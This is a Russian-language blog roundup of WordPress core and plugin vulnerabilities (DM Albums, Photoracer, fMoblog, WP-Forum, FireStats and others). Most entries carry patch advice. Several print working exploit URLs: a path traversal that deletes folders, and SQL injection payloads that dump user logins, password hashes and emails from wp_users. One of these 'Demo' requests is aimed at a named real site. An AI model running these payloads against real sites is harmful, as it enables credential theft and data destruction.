Уязвимость в плагине WordPress DM Albums 2.x
Найдена уязвимость в плагине WordPress DM Albums 2.x, которая позволяет провести XSS-атаку против вашего блога и получить доступ к файловой системе, с возможностью удаления папок.
Из-за ошибки при проверке входных данных в параметре "delete_album" сценарием dm-albums/wp-dm-albums-ajax.php. Атакующий может удалить папки извне root директории альбомов.
Эксплоит:
http://someblogsite/wp-content/plugins/dm-albums/wp-dm-albums-ajax.php?delete_album=../../../public_htm
Плагин обновлен 23.10.2009, с этим обновлением, исправлена и уязвимость, поэтому рекомендуется срочным образом читать далее ..
Уязвимость в файле wp-trackback.php
Свежая уязвимость в Wordpress которая позволяет провести DOS атаку на блог жертвы используя файл wp-trackback.php
Отключение трекбэков не избавляет от данной уязвимости, для того, чтобы обезопасить свой блог, необходимо установить плагин, который исправляет данную проблему.
Плагин можно скачать здесь
Эксплоит уязвимости: jarraltech.com/2009/10/new-0-day-wordpress-exploit/
Источник: blogproblog.com/wp-trackback_dos_attack/
Уязвимость Wordpress плагина DM Albums
В Wordpress плагине DM Albums найдена уязвимость, которая позволяет злоумышленнику удаленно выполнить произвольный PHP файл на сервере жертвы.
Уязвимость возникла в связи с небезопасной обработкой входящих данных, в переменной SECURITY_FILE в файле album.php.
Благодаря этой уязвимости, может быть выполнен любой PHP файл, на системе жертвы, с правами доступа Web-сервера.
Подробнее о уязвимости.
Уязвимость Wordpress плагина Photoracer 1.0
В плагине Photoracer 1.0 найдена уязвимость типа SQL-injection, которая позволяет злоумышленнику выполнить любые команды в базе данных Wordpress блога.
Данная уязвимость обеспечивается недостаточной обработкой данных, которые передаются скрипту viewimg.php. С помощью такого запроса, можно выполнять команды к базе данных:
http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--
Рекомендуется отключить плагин, до исправления ошибки или выхода новой версии.
Уязвимость в Wordpress плагине FireStats 1.6.1
Из-за неправильной обработки входных данных, злоумышленник может воспользоваться уязвимостью в плагине FireStats и выполнить любой сценарий с правами веб-сервера.
Передав имя файла, плагину, с помощью аргументов адресной строки, злоумышленник может передать имя файла, которое находится где-то на сервере.
Пример запроса: http://www.TARGET.com/[path]/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=[darkc0de]
Уязвимость Wordpress плагина fMoblog 2.1
Найдена уязвимость в Wordpress плагине fMoblog, которая позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных Wordpress.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «id».
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
# Exploit:
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,gr
oup_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo:
http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group
_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
Уязвимость в Wordpress MU < 2.7
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
Уязвимость существует из-за ошибки в функции choose_primary_blog при проверке HOST заголовка.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Для устранения уязвимости рекомендуется обновить Wordpress MU до версии 2.7
Подробности.
Уязвимость Wordpress плагина WP-Forum 1.7.8
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «thread» сценарием forum_feed.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=[SQL]
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*
Уязвимость в Wordpress ниже 2.6.3
Если вы еще не обновили свой блог, до версии 2.7, которая на данный момент является финальной стабильной версией Wordpress, возможно некоторые уязвимости в старых версиях Wordpress заставят вас задуматься об этом.
Jeremias Reith опубликовал уязвимость на сервис Bugtraq которая при удачном использовании позволяет злоумышленнику, получить доступ к панели администрирования вашего блога.
Данная уязвимость исправлена в версии Wordpress читать далее ..
Уязвимости в плагинах Media Holder и e-Commerce
Найдены уязвимости в Wordpress-плагинах Media Holder и E-Commerce.
На обе уязвимости уже выпущены эксплоиты, которые могут использоваться для нарушения безопасности Вашего блога.
Плагин Media Holder предназначен для размещения в блоге различных медиа-данных, видео, аудио и тп.
Плагин e-Commerce используется для создания интернет-магазина на основе вашего Wordpress-блога.
Уязвимость в плагине Wordpress Media Holder связана с ошибкой обработки данных при работе читать далее ..
